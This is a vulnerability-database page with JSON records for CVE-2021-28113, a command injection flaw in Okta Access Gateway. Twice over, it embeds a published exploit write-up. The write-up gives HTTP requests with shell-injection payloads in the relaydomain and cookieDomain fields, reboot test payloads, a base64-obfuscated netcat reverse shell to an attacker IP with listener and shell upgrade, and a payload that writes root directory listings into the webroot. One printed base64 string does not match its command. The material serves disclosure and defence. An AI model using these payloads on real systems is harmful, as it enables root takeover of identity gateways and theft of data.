DATABASE RESOURCES PRICING ABOUT US

{"id": "CVE-2021-28113", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-28113", "description": "A command injection vulnerability in the cookieDomain and relayDomain parameters of Okta Access Gateway before 2020.9.3 allows attackers (with admin access to the Okta Access Gateway UI) to execute OS commands as a privileged system account.", "published": "2021-04-02T15:15:00", "modified": "2022-05-27T16:47:00", "cvss": {"score": 8.7, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "PARTIAL", "baseScore": 8.7}, "severity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 9.5, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW", "baseScore": 6.7, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 1.2, "impactScore": 5.5}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28113", "reporter": "cve@mitre.org", "references": ["https://www.okta.com/security-advisories/cve-2021-28113", "http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html"], "cvelist": ["CVE-2021-28113"], "immutableFields": [], "lastseen": "2022-05-30T14:48:00", "viewCount": 45, "enchantments": {"dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:163428"]}, {"type": "zdt", "idList": ["1337DAY-ID-36532"]}], "rev": 4}, "score": {"value": 9.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:163428"]}, {"type": "zdt", "idList": ["1337DAY-ID-36532"]}]}, "exploitation": null, "vulnersScore": 9.1}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": "MITRE", "cvss": {"3": {"vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L", "score": 6.7}}}, "cpe": ["cpe:/a:okta:access_gateway:2020.8.4"], "cpe23": ["cpe:2.3:a:okta:access_gateway:2020.8.4:*:*:*:*:*:*:*"], "cwe": ["CWE-78"], "affectedSoftware": [{"cpeName": "okta:access_gateway", "version": "2020.8.4", "operator": "le", "name": "okta access gateway"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:okta:access_gateway:2020.8.4:*:*:*:*:*:*:*", "versionEndIncluding": "2020.8.4", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://www.okta.com/security-advisories/cve-2021-28113", "name": "https://www.okta.com/security-advisories/cve-2021-28113", "refsource": "CONFIRM", "tags": ["Vendor Advisory"]}, {"url": "http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html", "name": "http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}

{"zdt": [{"lastseen": "2021-12-04T15:52:43", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "HIGH", "baseScore": 6.7, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.5}, "published": "2021-07-07T00:00:00", "type": "zdt", "title": "Okta Access Gateway 2020.5.5 Authenticated Remote Root Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "PARTIAL", "integrityImpact": "COMPLETE", "baseScore": 8.7, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 9.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28113"], "modified": "2021-07-07T00:00:00", "id": "1337DAY-ID-36532", "href": "https://0day.today/exploit/description/36532", "sourceData": "Okta Access Gateway v2020.5.5 Post-Auth Remote Root RCE\n\nCVE-2021-28113\n\n=======\nDetails\n=======\n\nThere are two command injection bugs can that be triggered after authenticating to the web UI.\nSince the injection occurs when a script is executed with sudo, the commands are ran with root\nprivileges.\n\nBUG #1 - relay\n\nCommand injection as root in Applications via the 'relaydomain' field when passing\nparameters to generateCert.sh. This is blind injection, so without monitoring logs or\nlocal execution instrumentation, the output will not simply returned in the response.\n\nAlso, the included 'nc' binary that the system image includes has the -e flag available\nwhich enables an exploitation easier via connect back shell.\n\n[Request]\n\nPOST /api/v1/app/idp/[valid-IDP] HTTP/1.1\nHost: gw-admin.domain.tld\nContent-Type: application/json;charset=utf-8\nX-CSRF-TOKEN: [placeholder]\nContent-Length: 134\nCookie: CSRF-TOKEN=[placeholder]; JSESSIONID=[placeholder]; SessionCookie=[placeholder]\n\n{\"settings\":\n{\"label\":\"test\",\n\"type\":\"CERTHEADER2015_APP\",\n\"relaydomain\":\"..$(whoami)\", <-- HERE\n\"groups\":[],\n\"handlers\":{}}\n,\"policies\":[{}]}\n\n[Response /w local instrumentation for monitoring]\n\npid=23033 executed [/bin/bash /opt/oag/bin/generateCert.sh -w -d .root ]\n\n[Quick testing]\n\n\"relaydomain\":\"..$(reboot)\"\n\nand the system should reboot.\n\n[Exploitation for reverse shell]\n\nNote: for some bizzare reason, this payload worked for a period of time during testing, but was not generally reproducible afterwards.\n\n1) generate base64 for the connect back command to be executed\n\n$ echo -n \"nc 10.0.0.111 5000 -e /bin/bash\" | base64\nbmMgMTAuMTAuMTAuMTc5IDU1NTUgLWUgL2Jpbi9iYXNo\n\n2) start a listener\n\n$ nc -l -p 5000\n...\n\n3) make the request with the payload (.. is required due to how it parses domains)\n\n..$(echo${IFS}'bmMgMTAuMC4wLjExMSA1MDAwIC1lIC9iaW4vYmFzaA=='>test;$(base64${IFS}-d${IFS}test))\n\n4) get a root shell from the server\n\n* connection from 10.0.0.77 *\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\n\n[0] [email\u00a0protected];/root#\n\nBUG #2 - cookie\n\nCommand injection as root in Identity Providers via the 'cookieDomain' field when passing\nparameters to generateCert.sh.\n\n[Request]\n\nPOST /api/v1/setting/idp/local HTTP/1.1\nHost: gw-admin.domain.tld\nContent-Type: application/json;charset=utf-8\nX-CSRF-TOKEN: [placeholder]\nContent-Length: 222\nCookie: CSRF-TOKEN=[placeholder]; JSESSIONID=[placeholder]; SessionCookie=[placeholder]\n\n{\"subCategory\":\n\"IDP_SAML_LOCAL\",\n\"json\":{\n\"name\":\"Local OAG IDP\",\n\"host\":\"https://google.com\",\n\"cookieDomain\":\"$(uname${IFS}-n)\", <-- HERE\n\"nameIDFormat\":\"urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified\",\n\"metadata\":{}},\n\"$edit\":true}\n\n[Response /w local instrumentation for monitoring]\n\npid=22822 executed [/bin/bash /opt/oag/bin/generateCert.sh -w -d Linux oag 3.10.0-957.27.2.el7.x86_64\n#1 SMP Mon Jul 29 17:46:05 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux uid=0(root) gid=0(root) groups=0(root) ]\n\n[Quick testing]\n\n\"cookieDomain\":\"$(reboot)\"\n\nand the system should reboot.\n\n[Exploitation for executing commands with output in the webroot]\n\nSame note as the previous one; for some reason, this payload worked for a period of time during testing, but then stopped fully working (the bug was still there just less exploitable).\n\n1) generate base64 for \"ls -al /root\" to be written to a location accessible via web request\n\n$ echo -n \"script -q -c ls\\$IFS-al\\$IFS/root /opt/oag/simpleSAMLphp/www/test.php\" | base64 -w0\nc2NyaXB0IC1xIC1jIGxzJElGUy1hbCRJRlMvcm9vdCAvb3B0L29hZy9zaW1wbGVTQU1McGhwL3d3dy90ZXN0LnBocA==\n\n2) make the request with the payload\n\n$(echo${IFS}'c2NyaXB0IC1xIC1jIGxzJElGUy1hbCRJRlMvcm9vdCAvb3B0L29hZy9zaW1wbGVTQU1McGhwL3d3dy90ZXN0LnBocA=='>test;$(base64${IFS}-d${IFS}test))\n\n3) check https://gw-admin.domain.tld/auth/test.php for the output of the command\n\n===\nFix\n===\n\nThe cookie bug was a \"known issue\" and fixed in v2020.9.3 and the relay bug was also fixed and no longer works on the latest v2021.2.1.\n\nhttps://www.okta.com/security-advisories/cve-2021-28113/\n", "sourceHref": "https://0day.today/exploit/36532", "cvss": {"score": 8.7, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:P"}}], "packetstorm": [{"lastseen": "2021-07-07T16:11:49", "description": "", "cvss3": {}, "published": "2021-07-07T00:00:00", "type": "packetstorm", "title": "Okta Access Gateway 2020.5.5 Authenticated Remote Root", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-28113"], "modified": "2021-07-07T00:00:00", "id": "PACKETSTORM:163428", "href": "https://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html", "sourceData": "`Okta Access Gateway v2020.5.5 Post-Auth Remote Root RCE \n \nCVE-2021-28113 \n \n======= \nDetails \n======= \n \nThere are two command injection bugs can that be triggered after authenticating to the web UI. \nSince the injection occurs when a script is executed with sudo, the commands are ran with root \nprivileges. \n \nBUG #1 - relay \n \nCommand injection as root in Applications via the 'relaydomain' field when passing \nparameters to generateCert.sh. This is blind injection, so without monitoring logs or \nlocal execution instrumentation, the output will not simply returned in the response. \n \nAlso, the included 'nc' binary that the system image includes has the -e flag available \nwhich enables an exploitation easier via connect back shell. \n \n[Request] \n \nPOST /api/v1/app/idp/[valid-IDP] HTTP/1.1 \nHost: gw-admin.domain.tld \nContent-Type: application/json;charset=utf-8 \nX-CSRF-TOKEN: [placeholder] \nContent-Length: 134 \nCookie: CSRF-TOKEN=[placeholder]; JSESSIONID=[placeholder]; SessionCookie=[placeholder] \n \n{\"settings\": \n{\"label\":\"test\", \n\"type\":\"CERTHEADER2015_APP\", \n\"relaydomain\":\"..$(whoami)\", <-- HERE \n\"groups\":[], \n\"handlers\":{}} \n,\"policies\":[{}]} \n \n[Response /w local instrumentation for monitoring] \n \npid=23033 executed [/bin/bash /opt/oag/bin/generateCert.sh -w -d .root ] \n \n[Quick testing] \n \n\"relaydomain\":\"..$(reboot)\" \n \nand the system should reboot. \n \n[Exploitation for reverse shell] \n \nNote: for some bizzare reason, this payload worked for a period of time during testing, but was not generally reproducible afterwards. \n \n1) generate base64 for the connect back command to be executed \n \n$ echo -n \"nc 10.0.0.111 5000 -e /bin/bash\" | base64 \nbmMgMTAuMTAuMTAuMTc5IDU1NTUgLWUgL2Jpbi9iYXNo \n \n2) start a listener \n \n$ nc -l -p 5000 \n... \n \n3) make the request with the payload (.. is required due to how it parses domains) \n \n..$(echo${IFS}'bmMgMTAuMC4wLjExMSA1MDAwIC1lIC9iaW4vYmFzaA=='>test;$(base64${IFS}-d${IFS}test)) \n \n4) get a root shell from the server \n \n* connection from 10.0.0.77 * \npython -c 'import pty; pty.spawn(\"/bin/bash\")' \n \n[0] root@oag.okta.com;/root# \n \nBUG #2 - cookie \n \nCommand injection as root in Identity Providers via the 'cookieDomain' field when passing \nparameters to generateCert.sh. \n \n[Request] \n \nPOST /api/v1/setting/idp/local HTTP/1.1 \nHost: gw-admin.domain.tld \nContent-Type: application/json;charset=utf-8 \nX-CSRF-TOKEN: [placeholder] \nContent-Length: 222 \nCookie: CSRF-TOKEN=[placeholder]; JSESSIONID=[placeholder]; SessionCookie=[placeholder] \n \n{\"subCategory\": \n\"IDP_SAML_LOCAL\", \n\"json\":{ \n\"name\":\"Local OAG IDP\", \n\"host\":\"https://google.com\", \n\"cookieDomain\":\"$(uname${IFS}-n)\", <-- HERE \n\"nameIDFormat\":\"urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified\", \n\"metadata\":{}}, \n\"$edit\":true} \n \n[Response /w local instrumentation for monitoring] \n \npid=22822 executed [/bin/bash /opt/oag/bin/generateCert.sh -w -d Linux oag 3.10.0-957.27.2.el7.x86_64 \n#1 SMP Mon Jul 29 17:46:05 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux uid=0(root) gid=0(root) groups=0(root) ] \n \n[Quick testing] \n \n\"cookieDomain\":\"$(reboot)\" \n \nand the system should reboot. \n \n[Exploitation for executing commands with output in the webroot] \n \nSame note as the previous one; for some reason, this payload worked for a period of time during testing, but then stopped fully working (the bug was still there just less exploitable). \n \n1) generate base64 for \"ls -al /root\" to be written to a location accessible via web request \n \n$ echo -n \"script -q -c ls\\$IFS-al\\$IFS/root /opt/oag/simpleSAMLphp/www/test.php\" | base64 -w0 \nc2NyaXB0IC1xIC1jIGxzJElGUy1hbCRJRlMvcm9vdCAvb3B0L29hZy9zaW1wbGVTQU1McGhwL3d3dy90ZXN0LnBocA== \n \n2) make the request with the payload \n \n$(echo${IFS}'c2NyaXB0IC1xIC1jIGxzJElGUy1hbCRJRlMvcm9vdCAvb3B0L29hZy9zaW1wbGVTQU1McGhwL3d3dy90ZXN0LnBocA=='>test;$(base64${IFS}-d${IFS}test)) \n \n3) check https://gw-admin.domain.tld/auth/test.php for the output of the command \n \n=== \nFix \n=== \n \nThe cookie bug was a \"known issue\" and fixed in v2020.9.3 and the relay bug was also fixed and no longer works on the latest v2021.2.1. \n \nhttps://www.okta.com/security-advisories/cve-2021-28113/ \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163428/okta-gateway-rce.txt", "cvss": {"score": 8.7, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-06-13T17:56:59", "description": "A command injection vulnerability exists in Okta Access Gateway. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.7, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.5}, "published": "2022-06-13T00:00:00", "type": "checkpoint_advisories", "title": "Okta Access Gateway Command Injection (CVE-2021-28113)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "PARTIAL", "integrityImpact": "COMPLETE", "baseScore": 8.7, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.5, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28113"], "modified": "2022-06-13T00:00:00", "id": "CPAI-2021-1196", "href": "", "cvss": {"score": 8.7, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:P"}}]}